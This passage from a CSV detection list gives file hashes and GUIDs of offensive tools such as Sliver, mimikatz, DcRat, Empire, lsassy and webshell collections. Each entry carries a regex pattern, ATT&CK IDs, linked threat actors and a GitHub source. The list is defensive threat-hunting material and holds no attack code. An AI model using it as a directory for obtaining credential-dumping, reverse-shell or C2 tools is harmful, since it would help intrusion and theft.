"*2189fb112297e59da398ea1b3e4bfa997d6af054c7b365a1c60864515fc6807e*",".{0,1000}2189fb112297e59da398ea1b3e4bfa997d6af054c7b365a1c60864515fc6807e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23140"
"*219a4c8a8686b08c5f7d98b1386d4445e501b89404fc8dba6abd47bb271d640a*",".{0,1000}219a4c8a8686b08c5f7d98b1386d4445e501b89404fc8dba6abd47bb271d640a.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23141"
"*21a7803ec85cae6362c0ad25529e21ca76783570b93bacbe64d0502aef852b2f*",".{0,1000}21a7803ec85cae6362c0ad25529e21ca76783570b93bacbe64d0502aef852b2f.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","23142"
"*21af546e3eedebde001b961737c7c3d152d145baf1784c62690211c568a17da7*",".{0,1000}21af546e3eedebde001b961737c7c3d152d145baf1784c62690211c568a17da7.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","23143"
"*21b39873efe2560fc0c665814a00ce67c8f24ea170bf8cc14d19ccf9d46e6173*",".{0,1000}21b39873efe2560fc0c665814a00ce67c8f24ea170bf8cc14d19ccf9d46e6173.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23146"
"*21c01746c200094f58a104a378b055484d3230adf28e44a60608834e945643b0*",".{0,1000}21c01746c200094f58a104a378b055484d3230adf28e44a60608834e945643b0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23147"
"*21c1f56c071851f53f1b27dfe85fed9bd7da3141a9d80f665be59d370f761b34*",".{0,1000}21c1f56c071851f53f1b27dfe85fed9bd7da3141a9d80f665be59d370f761b34.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23148"
"*21c56f056bbf9526c9e4b73407ddac030dd9379bc4fa2813ac28662446567faf*",".{0,1000}21c56f056bbf9526c9e4b73407ddac030dd9379bc4fa2813ac28662446567faf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23149"
"*21c62294d438c1c391ebb39ec2540c9c3af515e656f395624ad9dbdbd214308d*",".{0,1000}21c62294d438c1c391ebb39ec2540c9c3af515e656f395624ad9dbdbd214308d.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","23150"
"*21c6b8cc941e0aa80e42c28dbaacec63f8ae187b1d689a9fd40616ea612dd931*",".{0,1000}21c6b8cc941e0aa80e42c28dbaacec63f8ae187b1d689a9fd40616ea612dd931.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","23151"
"*21c6e03b7a1e354d984e88080e3843f7fbd71df02fc91df92f99d4f8a11c5ea0*",".{0,1000}21c6e03b7a1e354d984e88080e3843f7fbd71df02fc91df92f99d4f8a11c5ea0.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","23152"
"*21c9869676708d67b55fe9f17c7c43fadaf3a9b27bf013b9bb0ba673d70da013*",".{0,1000}21c9869676708d67b55fe9f17c7c43fadaf3a9b27bf013b9bb0ba673d70da013.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a  web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","0","#filehash","N/A","10","10","118","56","2025-02-08T17:50:28Z","2022-07-15T05:51:04Z","23153"
"*21ca06b18698d14154a45822aaae1e3837d168cc7630bcd3ec3d8c68aaa959e6*",".{0,1000}21ca06b18698d14154a45822aaae1e3837d168cc7630bcd3ec3d8c68aaa959e6.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23154"
"*21d9bf55a6482b64b95791d7b90e8cc3aa1c3c133be82650daff5df113643b66*",".{0,1000}21d9bf55a6482b64b95791d7b90e8cc3aa1c3c133be82650daff5df113643b66.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","23157"
"*21db0a4b79dc31e1a31251fd69d793e6dd4839e3a869093f8abd8bc10aa4b7fb*",".{0,1000}21db0a4b79dc31e1a31251fd69d793e6dd4839e3a869093f8abd8bc10aa4b7fb.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","23158"
"*21dc78b6f950f4eae598993c27ff7af3528ae7b7a7bcc8126a691c4c6c65efc5*",".{0,1000}21dc78b6f950f4eae598993c27ff7af3528ae7b7a7bcc8126a691c4c6c65efc5.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23159"
"*21f131f283dffa84c44aa6c4c62bb97b77c8de8a08fb6ba50a449bdf9fa8bd46*",".{0,1000}21f131f283dffa84c44aa6c4c62bb97b77c8de8a08fb6ba50a449bdf9fa8bd46.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","23161"
"*21f37987d11f82d9a0b38b6caca5b5c7967172f3204c8ecc98cb3a5033097467*",".{0,1000}21f37987d11f82d9a0b38b6caca5b5c7967172f3204c8ecc98cb3a5033097467.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","23162"
"*21f59168d9679a4567facac1b9146c930bc5e47c7c5ad248ed9e4e4582c25008*",".{0,1000}21f59168d9679a4567facac1b9146c930bc5e47c7c5ad248ed9e4e4582c25008.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","0","#filehash","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","23164"
"*21f65143eef8b914b4b044ed3bbd518e05f5d8d08e326cf62e0f63e32de8a73f*",".{0,1000}21f65143eef8b914b4b044ed3bbd518e05f5d8d08e326cf62e0f63e32de8a73f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23165"
"*21f7c3a31ac72448d1e1aa4624672d7c3f7644fe7598ff109f2f87fd8de48cd7*",".{0,1000}21f7c3a31ac72448d1e1aa4624672d7c3f7644fe7598ff109f2f87fd8de48cd7.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","23166"
"*21fc92b2d8e6c439a04cb584d0b33c49e6c9460d754429795f3c7de68777772c*",".{0,1000}21fc92b2d8e6c439a04cb584d0b33c49e6c9460d754429795f3c7de68777772c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23168"
"*21fd3f69a45a2eeb1354cfb8e4b44c6d07cd30bf91698ac5831fbb13846f3f56*",".{0,1000}21fd3f69a45a2eeb1354cfb8e4b44c6d07cd30bf91698ac5831fbb13846f3f56.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","23169"
"*21fd88a16e0aa75cc0d7e4f814cbb33e57de921ab5648f94a949318023fdec7d*",".{0,1000}21fd88a16e0aa75cc0d7e4f814cbb33e57de921ab5648f94a949318023fdec7d.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","#filehash","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","23170"
"*21fff74c2464be8072328345721555138aed7e15adc531ae4f244820a0f3061f*",".{0,1000}21fff74c2464be8072328345721555138aed7e15adc531ae4f244820a0f3061f.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","23171"
"*22020898-6F0D-4D71-B14D-CB5897C5A6AA*",".{0,1000}22020898\-6F0D\-4D71\-B14D\-CB5897C5A6AA.{0,1000}","offensive_tool_keyword","CreateService","Creating a persistent service","T1543.003 - T1547.001 - T1050","TA0003","N/A","N/A","Persistence","https://github.com/uknowsec/CreateService","1","0","#GUIDproject","N/A","4","2","105","27","2021-04-26T06:43:12Z","2020-09-23T05:03:52Z","23172"
"*2202732c2585283f93fca9bee4c3f3709530fa450a1bea8bfb925768f38b2bb9*",".{0,1000}2202732c2585283f93fca9bee4c3f3709530fa450a1bea8bfb925768f38b2bb9.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#filehash","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","23173"
"*22048db7a9a636d9bebbce5d6e883f87942a5fe9546341bf66d234b89772df4b*",".{0,1000}22048db7a9a636d9bebbce5d6e883f87942a5fe9546341bf66d234b89772df4b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23174"
"*2204d8a72a2aeabf19965bb8590d8ea9f959b07375672745a52eaa81814fe531*",".{0,1000}2204d8a72a2aeabf19965bb8590d8ea9f959b07375672745a52eaa81814fe531.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","23175"
"*220922e65b5b988f62cd1390f7240ccfa0d8c71e7cfe3d3e6c84ee04a37c9910*",".{0,1000}220922e65b5b988f62cd1390f7240ccfa0d8c71e7cfe3d3e6c84ee04a37c9910.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","23177"
"*2209de0546bd10397e30fa70f9c04a6730bdeddd610ef7fbee491ed86a881c95*",".{0,1000}2209de0546bd10397e30fa70f9c04a6730bdeddd610ef7fbee491ed86a881c95.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23178"
"*220dea762dec11fe8d6a5b7a24b6af9e4b72dfc084e2b1b835ab661323486ecc*",".{0,1000}220dea762dec11fe8d6a5b7a24b6af9e4b72dfc084e2b1b835ab661323486ecc.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","#filehash","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","23179"
"*220f7d90df81af2d014e7dc80d6b6705b6b8f1013ca9938076a3bac88f6cae7d*",".{0,1000}220f7d90df81af2d014e7dc80d6b6705b6b8f1013ca9938076a3bac88f6cae7d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23180"
"*220fc01ba29a57c350860f685caf64d84175f214dd84a43cc16c577fa53c9308*",".{0,1000}220fc01ba29a57c350860f685caf64d84175f214dd84a43cc16c577fa53c9308.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","23181"
"*22101aecc2195c323fdd0d949014c993790c425693f60c2bbc2138b4a830a519*",".{0,1000}22101aecc2195c323fdd0d949014c993790c425693f60c2bbc2138b4a830a519.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","23182"
"*22101aecc2195c323fdd0d949014c993790c425693f60c2bbc2138b4a830a519*",".{0,1000}22101aecc2195c323fdd0d949014c993790c425693f60c2bbc2138b4a830a519.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","23183"
"*221986c87ed18ec810267b11b919766d2d556127d9a4f2b16f544b39a32c8573*",".{0,1000}221986c87ed18ec810267b11b919766d2d556127d9a4f2b16f544b39a32c8573.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","23185"
"*221ac33db7069624a6840a57b5adb7ed34ee49f911b200aa4c5d15cea7ebaf69*",".{0,1000}221ac33db7069624a6840a57b5adb7ed34ee49f911b200aa4c5d15cea7ebaf69.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","23186"
"*221ca3050fc71ed69e11ba092468ca4a99220e3dbb23e5c7d37b3f15a77b02e7*",".{0,1000}221ca3050fc71ed69e11ba092468ca4a99220e3dbb23e5c7d37b3f15a77b02e7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23187"
"*223068bbe721dda949ae91d8260b2c7ee7b991c409be7d909841874c37c4f073*",".{0,1000}223068bbe721dda949ae91d8260b2c7ee7b991c409be7d909841874c37c4f073.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23191"
"*223279bb628165de88609c81444f4a9bf9aac6f921ea155ac427a47d13b49084*",".{0,1000}223279bb628165de88609c81444f4a9bf9aac6f921ea155ac427a47d13b49084.{0,1000}","offensive_tool_keyword","ShimDB","Shim database persistence (Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","0","#filehash","N/A","9","1","37","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z","23192"
"*22348216348f97cfb574f25a1528cf1a766ccb1e70d33961a6f1b6cf4feff23c*",".{0,1000}22348216348f97cfb574f25a1528cf1a766ccb1e70d33961a6f1b6cf4feff23c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23193"
"*2235cb273649d86f24c4d843a9a637b44e528643a73ff9f6013c446df18c430c*",".{0,1000}2235cb273649d86f24c4d843a9a637b44e528643a73ff9f6013c446df18c430c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23194"
"*2236b69f5c5c266ca57af9f9a2fddd35a36b4dd4de5ee279f87d2bf2e769bc81*",".{0,1000}2236b69f5c5c266ca57af9f9a2fddd35a36b4dd4de5ee279f87d2bf2e769bc81.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","23195"
